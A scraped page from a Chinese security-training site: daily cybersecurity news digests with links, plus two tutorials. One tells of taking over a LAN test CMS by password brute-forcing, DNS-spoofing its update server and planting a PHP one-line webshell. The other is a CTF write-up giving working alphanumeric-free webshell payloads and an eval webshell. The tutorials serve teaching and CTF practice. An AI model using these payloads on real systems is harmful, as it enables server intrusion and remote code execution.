网络安全日报 2020年12月03日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现2个恶意npm软件包分发njRAT木马 https://www.zdnet.com/article/malicious-npm-packages-caught-installing-remote-access-trojans/ 2、微软删除18个在网页中插入广告的恶意Edge扩展 https://www.zdnet.com/article/microsoft-removes-18-malicious-edge-extensions-for-injecting-ads-into-web-pages/ 3、对400万个Docker镜像的分析显示一半存在严重漏洞 https://www.securityweek.com/analysis-4-million-docker-images-shows-half-have-critical-vulnerabilities 4、最新发现的Turla Crutch后门用于政府攻击 https://www.securityweek.com/newly-discovered-turla-backdoor-used-government-attacks 5、Google Project Zero披露了通过Wi-Fi远程利用的iOS漏洞 https://www.securityweek.com/google-details-iphone-zero-click-exploit-allowing-theft-user-data 6、荷兰皇家骑自行车联盟批量受到的勒索攻击和数据泄露 https://portswigger.net/daily-swig/royal-dutch-cycling-union-refuses-to-pay-ransom-following-data-breach 7、研究人员发现针对Docker 服务的新挖矿软件-Xanthe https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html 8、不完善的“ Go SMS Pro”补丁使其仍然暴露了数百万的用户数据 https://thehackernews.com/2020/12/incomplete-go-sms-pro-patch-left.html 9、研究人员发现利用多向量攻击和具有SSH横向移动的僵尸网络-Tsunami https://securityaffairs.co/wordpress/111761/malware/multi-vector-miner-tsunami-botnet.html 10、研究人员发现25个国家/地区使用移动间谍软件 https://www.cyberscoop.com/circles-mobile-spyware-citizen-lab/
网络安全日报 2020年12月02日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Magecart使用新的技术劫持PayPal交易 https://threatpost.com/magecart-hijacks-paypal-transactions/161697/ 2、Bismuth组织的间谍活动针对越南企业和政府机构 https://thehackernews.com/2020/12/nation-state-hackers-caught-hiding.html 3、医疗保健提供商AspenPointe泄露29.5万患者数据 https://www.bleepingcomputer.com/news/security/healthcare-provider-aspenpointe-data-breach-affects-295k-patients/ 4、罗克韦尔自动化产品中的漏洞使工程工作站易受攻击 https://www.securityweek.com/flaws-rockwell-automation-product-expose-engineering-workstations-attacks 5、巴西航空工业公司披露网络攻击 https://www.securityweek.com/brazilian-plane-maker-embraer-targeted-cyberattack 6、法国医药供应链管理平台Apodis Pharma泄漏1.7 TB以上机密数据 https://securityaffairs.co/wordpress/111756/data-breach/apodis-pharma-data-leak.html 7、DarkIRC僵尸网络正在积极利用WebLogic CVE-2020-14882 漏洞 https://securityaffairs.co/wordpress/111743/hacking/darkirc-oracle-weblogic-cve-2020-14882.html 8、Shirbit保险公司遭网络攻击后泄露用户信息 https://www.jpost.com/israel-news/personal-information-leaked-in-suspected-cyberattack-on-shirbit-insurance-650781 9、在线学习公司K12 Inc.遭勒索软件攻击后支付了赎金 https://www.securityweek.com/online-learning-company-k12-paying-ransom-following-ransomware-attack 10、巴尔的摩县学校在勒索软件攻击后被迫关校 https://securityaffairs.co/wordpress/111732/cyber-crime/baltimore-county-schools-ransomware.html
网络安全日报 2020年12月01日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现RTA的ENIP堆栈存在严重漏洞 https://securityaffairs.co/wordpress/111646/ics-scada/automation-systems-opens-flaw.html 2、执法机构阻止了暗网上大规模的被盗信用数据交易 https://www.hackread.com/authorities-disrupt-dark-web-credit-card-trading-scam/ 3、特拉华县向DoppelPaymer勒索软件团伙支付赎金 https://www.bleepingcomputer.com/news/security/pennsylvania-county-pays-500k-ransom-to-doppelpaymer-ransomware/ 4、研究人员发现OceanLotus 组织使用了新的macOS后门 https://threatpost.com/macos-users-targeted-oceanlotus-backdoor/161655/ 5、WebKit浏览器内核存在多个漏洞可被进行远程代码执行 https://www.securityweek.com/webkit-vulnerabilities-allow-remote-code-execution-malicious-websites 6、媒体制作巨头Banijay遭勒索软件攻击 https://www.securityweek.com/media-production-giant-banijay-hit-ransomware 7、研究人员发现多家厂商的SD-WAN产品严重漏洞 https://www.securityweek.com/sd-wan-product-vulnerabilities-allow-hackers-steer-traffic-shut-down-networks 8、研究人员在Schneider Electric StruxureWare中发现6个零日漏洞 https://securityaffairs.co/wordpress/111692/hacking/schneider-electric-zero-days.html 9、恶意软件绕过DNA筛选并导致“生物黑客”攻击 https://securityaffairs.co/wordpress/111681/hacking/biohacking-attacks-dna-screening.html 10、TrickBot在遭拆除后已经迅速修复和重新发展 https://www.cyberscoop.com/trickbot-status-microsoft-cyber-command-takedown/
网络安全日报 2020年11月30日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、TurkeyBombing针对Zoom用户 https://threatpost.com/turkeybombing-zoom-abuse/161646/ 2、佳能披露2020年8月遭勒索软件攻击导致数据被盗 https://www.securityweek.com/canon-says-data-stolen-august-2020-ransomware-attack 3、ACROS Security发布针对Windows 7零日漏洞的非官方补丁 https://www.securityweek.com/unofficial-patch-released-windows-7-zero-day-vulnerability 4、Drupal发布带外安全更新修复远程代码执行漏洞 https://www.securityweek.com/drupal-releases-out-band-security-updates-due-availability-exploits 5、安全研究人员解释如何防范SMB中继攻击 https://heimdalsecurity.com/blog/what-is-an-smb-relay-attack/ 6、Bandook恶意软件发动对多个行业的新一轮攻击 https://thehackernews.com/2020/11/digitally-signed-bandook-malware-once.html 7、黑客正在出售数百名高管的电子邮件账户密码 https://www.zdnet.com/article/a-hacker-is-selling-access-to-the-email-accounts-of-hundreds-of-c-level-executives/ 8、网络犯罪组织利用黑匣子攻击技术意大利的ATM机中盗走了80万欧元 https://securityaffairs.co/wordpress/111659/cyber-crime/black-box-attack-italy.html 9、IIoT芯片制造商Advantech遭Conti勒索软件攻击 https://securityaffairs.co/wordpress/111606/security/advantech-conti-ransomware.html 10、工业自动化系统易受黑客的远程攻击 https://securityaffairs.co/wordpress/111646/ics-scada/automation-systems-opens-flaw.html
网络安全日报 2020年11月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、澳大利亚法律服务提供商遭受勒索软件攻击 https://www.itnews.com.au/news/law-in-order-hit-by-ransomware-attack-558197 2、Stantinko僵尸网络正在针对Linux服务器 https://thehackernews.com/2020/11/stantinko-botnet-now-targeting-linux.html 3、黑客利用与FBI相似的域名窃取用户信息 https://www.securityweek.com/fbi-warns-spoofed-fbi-related-domains 4、丹麦最大的新闻通讯社Ritzau遭到勒索软件攻击 https://securityaffairs.co/wordpress/111507/cyber-crime/ritzau-ransomware-attack.html 5、网络安全公司Sophos遭数据泄露 https://securityaffairs.co/wordpress/111495/data-breach/sophos-data-leak.html 6、安全研究人员发现Windows 7和Server 2008中的零日漏洞 https://securityaffairs.co/wordpress/111485/hacking/windows-7-server-2008-0day.html 7、Acronis与世界经济论坛合作打击全球网络犯罪 https://www.infosecurity-magazine.com/news/acronis-world-economic-forum?&web_view=true 8、印度在线求职网站IIMJobs的140万条记录在暗网上出售 https://inc42.com/buzz/data-of-1-4-mn-users-on-iimjobs-allegedly-leaked-on-dark-web/ 9、澳大利亚间谍机构收集了COVID-19应用程序数据 https://techcrunch.com/2020/11/24/australia-spy-agencies-covid-19-app-data/ 10、新的 Egregor勒索软件加入Maze https://www.infosecurity-magazine.com/news/egregor-ransomware-steps-maze/
网络安全日报 2020年11月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究团队发现3.8亿条涉及Spotify用户数据的记录 https://www.vpnmentor.com/blog/report-spotify-scam/2、房地产公司科可兰集团大量客户信息遭受泄露 https://securethoughts.com/real-estate-firm-exposed-vast-database-to-meow-bot-attack/3、黑客组织Anonymous攻击了乌干达警察网站 https://www.infosecurity-magazine.com/news/anonymous-hacks-uganda-police/4、研究人员发现多款视频门铃存在多个安全漏洞 https://www.darkreading.com/iot/security-researchers-sound-alarm-on-smart-doorbells/d/d-id/13395235、cPanel修复了2FA绕过漏洞 https://www.securityweek.com/2fa-bypass-vulnerability-patched-cpanel-webhost-manager6、网络和电缆制造商Belden披露数据泄露 https://www.securityweek.com/belden-discloses-data-breach-affecting-employee-business-information7、研究人员用激光入远距离入侵控制Amazon Alexa设备 https://threatpost.com/light-based-attacks-digital-home/161583/8、MobileIron 移动设备管理系统存在高危漏洞 https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/9、安全研究人员发现CNAME配置错误使数千个组织易受子域接管攻击 https://portswigger.net/daily-swig/rampant-cname-misconfiguration-leaves-thousands-of-organizations-open-to-subdomain-takeover-attacks-nbsp-research10、NPM中的Frenchbread Private-ip存在输入验证错误可导致SSRF攻击 https://securityledger.com/2020/11/exploitable-flaw-in-npm-private-ip-app-lurks-everywhere-anywhere/
利用官网getshell
(此方法只适用于特定环境,勿喷,求评论) 0x01 呕吼,各位大表哥们,又是我,影子,上次说了一下arp内网欺骗,但是我是搞Web的啊,我搞这干嘛?(手动狗头) 今天来次实战求评论,求反响 本文涉及知识点实操练习——https://www.yijinglab.com/expc.do?ec=ECID5504-22b1-44f6-984f-1339663ac214通过该实操的练习,了解文件上传漏洞的原理,通过代码审计掌握文件上传漏洞产生的原因、上传绕过的方法以及修复方法。 0x02 大表哥在局域网里面搞了个网站让我日。。 沃日™  大表哥还算好,把验证码给我关了,哈哈哈哈   0x03 进去先看一眼  大表哥把源码给我了,审一波 第一个入眼的就是admin 测试一波,大表哥吧验证码给关了,真好,哈哈哈哈  随手试几个 不知道你们有没有看清楚,大表哥第一张给我拍的照片没有打码,哈哈哈,里面有用户名,这算不算信息泄露呢,哈哈哈  第一张图片可以勉强看出来 用户名是admin 大表哥又把验证码关了,哈哈哈,这不就是让我爆破吗 祭出我的神器,burpsuite     密码明文传输 省了我很多事 掏出我的珍藏版字典  字典很棒哦第二个包就成功了  直接登录  后台在手,天下我有 咳咳  找到一个上传图片的地方、抓一下包,上个shell,完事,哈哈哈哈   再试一下解析漏洞 把20改成00    擦 Md 懒得审代码了,直接找度娘  漏洞POC 本地尝试复现  本地复现成功 Then ??? 有什么用处? 曰,就一个本地包含,没公开的,md,我要苦逼的审代码? 那是必然不可能的,一切随缘法 0x04 事情来了转机 获取更新列表 直接从官网获得更新后的代码,并写入本地  直接上kali Ssh连上之后    Dns欺骗一下 Etter.dns 添加俩条记录  这个cms团队的人为了安全考虑 并没有在发行版中添加这个函数 所以说我们现在dns欺骗之后,本地的网站并不会更新成功,所以 直接写一段代码,在网站更新的时候访问的那个网址,直接返回需要的数据 先随便下载个文件,看一下值   我们可以看到,我们执行的是getServerFile函数  直接修改  访问控制器  更新的根本就是直接获取数据,进行写入 $des 的值就是写入目录   我们在我们的start.php 添加一句话木马 并把 这段代码注释   再次访问getServerFile函数 获取写入一句话木马的值 写一段php代码 在访问这个网址的时候,直接返回这个值 Index.php:  再次进行目标网站的更新  更新的 /doc/ChangeLog.txt 修改为 /core/start.php  更新  更新成功 访问小马  咳咳 不说了 跑路了
浅析CTF绕过字符数字构造shell
前言 在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。 无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。 本文涉及知识点实操练习——https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014050616024000001 :通过本实操的练习,你能够学会使用简单的Webshell,了解到使用base64与deflate对字符串进行编码,对编码后的webshell进行解码。 测试源码 <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {   eval($_GET['shell']); } //如果shell中不还有字母和数字,则可以执行eval语句 异或绕过 异或的符号是^,是一种运算符。 1 ^ 1 = 0 1 ^ 0 = 1 0 ^ 1 = 1 0 ^ 0 = 0 异或脚本 <?php for($i=128;$i<255;$i++){     echo sprintf("%s^%s",urlencode(chr($i)),urlencode(chr(255)))."=>". (chr($i)^chr(255))."\n"; } ?> 运行该脚本我们知道 %81^%FF=>~     %82^%FF=>}       %83^%FF=>| %84^%FF=>{     %85^%FF=>z       %86^%FF=>y %87^%FF=>x     %88^%FF=>w       %89^%FF=>v %8A^%FF=>u     %8B^%FF=>t       %8C^%FF=>s %8D^%FF=>r     %8E^%FF=>q       %8F^%FF=>p %90^%FF=>o     %91^%FF=>n       %92^%FF=>m %93^%FF=>l     %94^%FF=>k       %95^%FF=>j %96^%FF=>i     %97^%FF=>h       %98^%FF=>g %99^%FF=>f     %9A^%FF=>e       %9B^%FF=>d %9C^%FF=>c     %9D^%FF=>b       %9E^%FF=>a %9F^%FF=>`     %A0^%FF=>_       %A1^%FF=>^ %A2^%FF=>]     %A3^%FF=>\       %A4^%FF=>[ %A5^%FF=>Z     %A6^%FF=>Y       %A7^%FF=>X %A8^%FF=>W     %A9^%FF=>V       %AA^%FF=>U %AB^%FF=>T     %AC^%FF=>S       %AD^%FF=>R     %AE^%FF=>Q     %AF^%FF=>P       %B0^%FF=>O %B1^%FF=>N     %B2^%FF=>M       %B3^%FF=>L %B4^%FF=>K     %B5^%FF=>J       %B6^%FF=>I %B7^%FF=>H     %B8^%FF=>G       %B9^%FF=>F %BA^%FF=>E     %BB^%FF=>D       %BC^%FF=>C %BD^%FF=>B     %BE^%FF=>A       %BF^%FF=>@ %C0^%FF=>? 通过这种方法构造一个phpinfo()函数 ${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo //${_GET}{%ff}();&%ff=phpinfo 我们知道,经过一次get传参会进行一次URL解码,所以我们可以将字符先进行url编码再进行异或得到我们想要的字符。 %A0^%FF=>_  %B8^%FF=>G %BA^%FF=>E   %AB^%FF=>T  <?php $a = urldecode('%ff%ff%ff%ff'); $b = urldecode('%a0%b8%ba%ab'); echo $a^$b; //输出_GET 取反绕过 取反的符号是~,也是一种运算符。在数值的二进制表示方式上,将0变为1,将1变为0。 直接看如何构造phpinfo() (~%8F%97%8F%96%91%99%90)(); 可以看出,自己对phpinfo取反,会产生一些不可见字符,可对phpinfo取反后再进行url编码。 取反脚本 <?php $a = urlencode(~'phpinfo'); echo $a; //%8F%97%8F%96%91%99%90 构造assert字符 第一种方法 %9E^%FF=>a  %8C^%FF=>s  %9A^%FF=>e  %8D^%FF=>r  %8B^%FF=>t     %A0^%FF=>_      %AF^%FF=>P   %B0^%FF=>O  %AC^%FF=>S  %AB^%FF=>T       $_="%9E%8C%8C%9A%8D%8B"^"%FF%FF%FF%FF%FF%FF"; $__="%A0%AF%B0%AC%AB"^"%FF%FF%FF%FF%FF"; $___=$__; $_($___[_]); 第二种方法 脚本 <?php $shell = "assert"; $result1 = ""; $result2 = ""; for($num=0;$num<=strlen($shell);$num++) {     for($x=33;$x<126;$x++)     {         if(judge(chr($x)))         {             for($y=33;$y<=126;$y++)             {                 if(judge(chr($y)))                 {                     $f = chr($x)^chr($y);                     if($f == $shell[$num])                     {                         $result1 .= chr($x);                         $result2 .= chr($y);                         break 2;                     }                 }             }         }     } } echo $result1; echo "<br>"; echo $result2; function judge($c) {     if(!preg_match('/[a-z0-9]/is',$c))     {         return true;     }     return false; } 这个脚本可以将“assert”变成两个字符串异或的结果,通过更改shell的值可以构造出我们想要的字符串。为了便于表示,生成字符串的范围为33-126(可见字符)。 <?php $_ = "!((%)("^"@[[@[\\";   //构造出assert $__ = "!+/(("^"~{`{|";   //构造出_POST $___ = $__;   //$___ = $_POST $_($___[_]);   //assert($_POST[_]); ?shell=%24_+%3d+%22!((%25)(%22^%22%40[[%40[\\%22%3b%24__+%3d+%22!%2b%2f((%22^%22~{`{|%22%3b%24___+%3d+%24%24__%3b%24_(%24___[_])%3b $_ = "!((%)("^"@[[@[\\"; $__ = "!+/(("^"~{`{|";   $___ = $__;  $_($___[_]); %24%5f%3d%22%21%28%28%25%29%28%22%5e%22%40%5b%5b%40%5b%5c%5c%22%3b%24%5f%5f%3d%22%21%2b%2f%28%28%22%5e%22%7e%7b%60%7b%7c%22%3b%24%5f%5f%5f%3d%24%24%5f%5f%3b%24%5f%28%24%5f%5f%5f%5b%5f%5d%29%3b 第三种方法 <?php $a = urlencode(~'assert'); echo $a; //%9E%8C%8C%9A%8D%8B $b = urlencode(~'_POST'); //%A0%AF%B0%AC%AB <?php $_ = ~"%9e%8c%8c%9a%8d%8b";   //得到assert,此时$_="assert" $__ = ~"%a0%af%b0%ac%ab";   //得到_POST,此时$__="_POST" $___ = $__;   //$___=$_POST $_($___[_]);   //assert($_POST[_]) ?shell=$_=~"%9e%8c%8c%9a%8d%8b";$__=~"%a0%af%b0%ac%ab";$___=$__;$_($___[_]); PHP5和7的区别 PHP5中,assert()是一个函数,我们可以用_()这样的形式来执行代码。但在PHP7中,assert()变成了一个和eval()一样的语言结构,不再支持上面那种调用方法。但PHP7.0.12下还能这样调用。                                    PHP5                              PHP  7.0.12                                    PHP7 PHP5中,是不支持($a)()这种调用方法的,但在PHP7中支持这种调用方法,因此支持这么写('phpinfo')();                                  PHP 5                                      PHP 7 过滤了_ ?><?=`{${~"%a0%b8%ba%ab"}[%a0]}`?> 分析下这个Payload,?>闭合了eval自带的<?标签。接下来使用了短标签。{}包含的PHP代码可以被执行,~"%a0%b8%ba%ab"为"_GET",通过反引号进行shell命令执行。最后我们只要GET传参%a0即可执行命令。 过滤了$ PHP7 在PHP7中,我们可以使用($a)()这种方法来执行命令。所以可以用取反构造payload执行命令。(~%8F%97%8F%96%91%99%90)();执行phpinfo函数,第一个括号中可以是任意的表达式。但是这里不能用assert()来执行函数,因为php7不支持assert()函数。 PHP5 在PHP5中不再支持(a)()方法来调用函数,在膜拜P神的[无字母数字webshell之提高篇](https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html?page=2#reply-list)后,有了新的启发。如何在无字母,数字,的系统命令下getshell?我们利用在Linux shell下两个知识点 1,shell下可以利用.来执行任意脚本 2,Linux文件名支持glob通配符代替 从图可以看出,我们可以成功用.+文件名来执行文件,但是当使用通配符来执行文件时,系统会执行匹配到的第一个文件。 在这两个条件下我们可以想到,如果我们可以上传一个文件,用.来执行这个文件就可以成功getshell。 那么我们怎么上传文件呢?上传文件成功后文件又保存在哪里?怎么匹配执行? 首先我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。 现在我们可以利用glob通配符匹配该文件,我们知道 *可以代替0个及以上任意文件 ?可以代表1个任意字符 [^a]可以用来判断这个位置的字符是不是a [0-9]可以用来限制范围 通过ascii码表我们知道,可见大写字母@与[之间,所以我们可以利用[@-[]来表示大写字母。 综上,我们可以利用. /???/????????[@-[]来匹配/tmp/phpXXXXXX 实战演练 <?php if(isset($_GET['evil'])){     if(strlen($_GET['evil'])>25||preg_match("/[\w$=()<>'\"]/", $_GET['evil'])){         die("danger!!");     }     @eval($_GET['evil']); } highlight_file(__FILE__); ?> 通过编写脚本看看哪些可见字符没有被过滤 <?php for ($ascii = 0; $ascii < 256; $ascii++) {     if (!preg_match("/[\w$=()<>'\"]/", chr($ascii))) {         echo (chr($ascii));     } } ?> 可以发现过滤了字母,数字,` {{title}}
,`_`,`()`等,但`和  .  还没有被过滤。由于过滤了()所以不论PHP版本是5或者7,都不能执行($a)(),所以就没有必要去判断PHP版本。由此可以想到上传一个小马文件,然后用 `  来执行文件。 首先,我们应该上传写一个表单上传 <!DOCTYPE html> <html lang="en"> <head>  <meta charset="UTF-8">  <title>Document</title> </head> <body>  <form action="http://ip:*****/" method="post" enctype="multipart/form-data">      <input type="file" name="file">   <input type="submit" value="提交">  </form> </body> </html> 提交一个1.txt的文件,这个文件会被保存在这个/tmp/phpXXXXXX临时文件夹下,我们执行这个临时文件夹就是执行1.txt文件里面的内容。 我们在把1.txt中写入ls,并把执行完1.txt文件返回的内容(即执行ls返回的内容)保存在var/www/html目录下的abc文件中 var/www/html是Apache的默认路径,我们也可以直接写ls />abc 接着在ip地址后添加/abc,可以看到成功返回执行1.txt后的内容。 直接cat flag 我们还可以上传一个小马文件get flag 例如我们创建一个hello.php的文件,文件内容为 echo "<?php eval(\$_POST['shell']);"  然后cat flag
网络安全日报 2020年11月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现新的CursedGrabber恶意软件 https://securityaffairs.co/wordpress/111321/malware/cursedgrabber-malware-campaign.html 2、英国国会议员每月受到近三百万次电子邮件攻击 https://www.infosecurity-magazine.com/news/mps-bombarded-three-million-email/ 3、黑客诱骗GoDaddy员工以更改某些加密货币网站的DNS设置 https://www.securityweek.com/hackers-trick-godaddy-employees-operation-targeting-cryptocurrency-services 4、cPanel中的2FA绕过漏洞影响上千万网站 https://securityaffairs.co/wordpress/111415/hacking/2fa-bypass-cpanel.html 5、新Stantinko Bot伪造成httpd针对Linux服务器 https://securityaffairs.co/wordpress/111393/malware/stantinkos-linux-variant.html 6、Microsoft通过带外更新修复了Kerberos身份验证问题 https://securityaffairs.co/wordpress/111375/security/microsoft-kerberos-authentication-issues.html 7、TA416 APT使用由Golang编写的PlugX恶意软件加载程序 https://threatpost.com/ta416-apt-plugx-malware-variant/161505/ 8、新的WAPDropper恶意软件针对Android用户进行WAP欺诈 https://www.zdnet.com/article/new-wapdropper-malware-abuses-android-devices-for-wap-fraud/ 9、百度两款应用程序因隐私策略被Google Play下架 https://www.zdnet.com/article/baidus-android-apps-caught-collecting-sensitive-user-details/ 10、活动票务平台Peatix的420万用户数据在线泄露 https://www.zdnet.com/article/hacker-leaks-the-user-data-of-event-management-app-peatix/
网络安全日报 2020年11月24日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员表明特斯拉Model X可能在几分钟内被盗 https://www.securityweek.com/researchers-show-tesla-model-x-can-be-stolen-minutes 2、VMware披露 Workspace One组件中的0day漏洞 https://securityaffairs.co/wordpress/111355/security/vmware-cve-2020-4006-zero-day.html 3、TikTok修复了可能导致帐户接管的安全漏洞 https://securityaffairs.co/wordpress/111336/hacking/tiktok-domains-security-flaws.html 4、基督教信仰应用Pray.com泄露超1000W用户数据 https://threatpost.com/10m-impacted-pray-com-data-exposure/161459/ 5、Spotify用户遭凭证填充攻击 https://threatpost.com/spotify-account-takeovers/161495/ 6、ImageMagick 被发现 Shell 注入漏洞 https://portswigger.net/daily-swig/imagemagick-pdf-parsing-flaw-allowed-attacker-to-nbsp-execute-shell-commands-via-maliciously-crafted-image 7、GitHub修复了Google发现的高危漏洞 https://www.zdnet.com/article/github-fixes-high-severity-security-flaw-spotted-by-google/ 8、韩国零售集团E-Land Group遭勒索软件攻击被迫关闭一半商店 https://www.koreatimes.co.kr/www/tech/2020/11/694_299692.html 9、下一代WAF将取代传统的Web应用程序防火墙 https://thehackernews.com/2020/11/why-replace-traditional-web-application.html 10、Drupal存在文件解析漏洞 https://www.helpnetsecurity.com/2020/11/23/cve-2020-13671/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页